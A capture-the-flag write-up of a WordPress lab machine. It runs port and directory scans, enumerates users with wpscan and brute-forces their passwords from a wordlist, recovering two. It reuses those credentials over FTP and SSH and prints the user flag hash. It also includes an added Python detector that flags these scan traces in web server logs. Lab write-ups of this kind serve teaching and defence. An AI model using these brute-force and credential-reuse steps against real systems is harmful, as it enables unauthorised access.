PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to <http://funbox.fritz.box/>
| http-robots.txt: 1 disallowed entry
|_/secret/
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data.
When we browse to the IP we are redirected to http://funbox.fritz.box/, so add that hostname to /etc/hosts first.
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://funbox.fritz.box/> -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.hta (Status: 403) [Size: 281]
/.htpasswd (Status: 403) [Size: 281]
/.htaccess (Status: 403) [Size: 281]
/index.php (Status: 301) [Size: 0] [--> <http://funbox.fritz.box/>]
/robots.txt (Status: 200) [Size: 19]
/secret (Status: 301) [Size: 321] [--> <http://funbox.fritz.box/secret/>]
/server-status (Status: 403) [Size: 281]
/wp-admin (Status: 301) [Size: 323] [--> <http://funbox.fritz.box/wp-admin/>]
/wp-includes (Status: 301) [Size: 326] [--> <http://funbox.fritz.box/wp-includes/>]
/wp-content (Status: 301) [Size: 325] [--> <http://funbox.fritz.box/wp-content/>]
/xmlrpc.php (Status: 405) [Size: 42]
The /secret/ directory is a troll, and this looks like another WordPress site.
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://funbox.fritz.box/> --enumerate u
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://funbox.fritz.box/> [192.168.158.77]
[+] Started: Mon Jul 18 04:31:22 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: <http://funbox.fritz.box/robots.txt>
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://funbox.fritz.box/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://funbox.fritz.box/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: <http://funbox.fritz.box/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://funbox.fritz.box/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - <http://funbox.fritz.box/index.php/feed/>, <generator><https://wordpress.org/?v=5.4.2></generator>
| - <http://funbox.fritz.box/index.php/comments/feed/>, <generator><https://wordpress.org/?v=5.4.2></generator>
[+] WordPress theme in use: twentyseventeen
| Location: <http://funbox.fritz.box/wp-content/themes/twentyseventeen/>
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: <http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt>
| [!] The version is out of date, the latest version is 3.0
| Style URL: <http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507>
| Style Name: Twenty Seventeen
| Style URI: <https://wordpress.org/themes/twentyseventeen/>
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507>, Match: 'Version: 2.3'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <========> (10 / 10) 100.00% Time: 00:00:02
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - <http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1>
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] joe
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
There is no interesting plugin, but we found the users joe and admin.
First we brute-force joe's credentials using wpscan:
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://funbox.fritz.box/> -U joe -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: joe, Password: 12345
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://funbox.fritz.box/> -U admin -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: admin, Password: iubire
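As an added detection-side example (not part of the original writeup), the script below flags in Apache access logs the traces the two wpscan runs above leave behind: the author ID brute forcing, the wp-json users listing and the burst of login POSTs from the password brute force. The log lines are constructed, and 192.168.158.10 is an assumed scanner address, not one from the writeup.

```python
import re
from collections import Counter, defaultdict

# Apache combined log format; only source IP, method and path are needed here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"')

def analyze(lines, login_threshold=20, author_threshold=5):
    """Return sorted (ip, finding, count) tuples for the patterns wpscan leaves behind:
    bursts of POSTs to wp-login.php / xmlrpc.php (password brute force), a run of
    distinct ?author=N requests (author ID brute forcing) and any hit on the REST
    users endpoint (user listing)."""
    logins = Counter()
    authors = defaultdict(set)
    rest_users = set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; skip rather than crash
        ip, method, path = m.group("ip", "method", "path")
        if method == "POST" and (path.startswith("/wp-login.php") or path.startswith("/xmlrpc.php")):
            logins[ip] += 1
        a = re.search(r"[?&]author=(\d+)", path)
        if a:
            authors[ip].add(int(a.group(1)))
        if "/wp-json/wp/v2/users" in path:
            rest_users.add(ip)
    findings = []
    findings += [(ip, "login brute force", n) for ip, n in logins.items() if n >= login_threshold]
    findings += [(ip, "author ID enumeration", len(ids)) for ip, ids in authors.items()
                 if len(ids) >= author_threshold]
    findings += [(ip, "REST user listing", 1) for ip in rest_users]
    return sorted(findings)

# Constructed sample log; 192.168.158.10 is an assumed scanner address, not one from the writeup.
SAMPLE_LOG = (
    [f'192.168.158.10 - - [18/Jul/2022:04:31:{10 + i:02d} +0000] "GET /?author={i} HTTP/1.1" 301 0'
     for i in range(1, 11)]
    + ['192.168.158.10 - - [18/Jul/2022:04:31:25 +0000] '
       '"GET /wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 512']
    + ['192.168.158.10 - - [18/Jul/2022:04:32:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4021'] * 25
    + ['192.168.158.20 - - [18/Jul/2022:04:33:00 +0000] "GET /index.php/feed/ HTTP/1.1" 200 1200']
)

if __name__ == "__main__":
    for ip, finding, count in analyze(SAMPLE_LOG):
        print(f"{ip}: {finding} (x{count})")
```

The thresholds are deliberately low for the sample; in production, count per IP inside a sliding time window rather than over the whole file.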
Now that we have credentials, try them on FTP as joe:
┌──(kali㉿VirtualBox)-[~]
└─$ ftp 192.168.158.77
Connected to 192.168.158.77.
220 ProFTPD Server (Debian) [192.168.158.77]
Name (192.168.158.77:kali): joe
331 Password required for joe
Password: 12345
230 User joe logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||50059|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 5 joe joe 4096 Aug 21 2020 .
drwxr-xr-x 4 root root 4096 Jun 19 2020 ..
lrwxrwxrwx 1 joe joe 9 Aug 21 2020 .bash_history -> /dev/null
-rw-r--r-- 1 joe joe 220 Jun 19 2020 .bash_logout
-rw-r--r-- 1 joe joe 3771 Jun 19 2020 .bashrc
drwx------ 2 joe joe 4096 Jun 19 2020 .cache
drwxrwxr-x 3 joe joe 4096 Jul 18 2020 .local
-rw-r--r-- 1 root root 33 Jul 18 08:24 local.txt
-rw------- 1 joe joe 998 Jul 18 2020 mbox
-rw-r--r-- 1 joe joe 807 Jun 19 2020 .profile
drwx------ 2 joe joe 4096 Jun 22 2020 .ssh
226 Transfer complete
The easiest win from here is grabbing local.txt, but we don't have a shell yet.
ftp> get local.txt
┌──(kali㉿VirtualBox)-[~]
└─$ cat local.txt
2f9436b9fcce0c838e68df9de8296466
How about trying the same credentials for the SSH login?
┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected]
[email protected]'s password: 12345
joe@funbox:~$ whoami
joe
joe@funbox:~$ cat local.txt
2f9436b9fcce0c838e68df9de8296466
So I wasted about 30 minutes here trying to transfer an SSH key via FTP, but it was not working.
We can't use sudo -l, so we look for SUID binaries instead.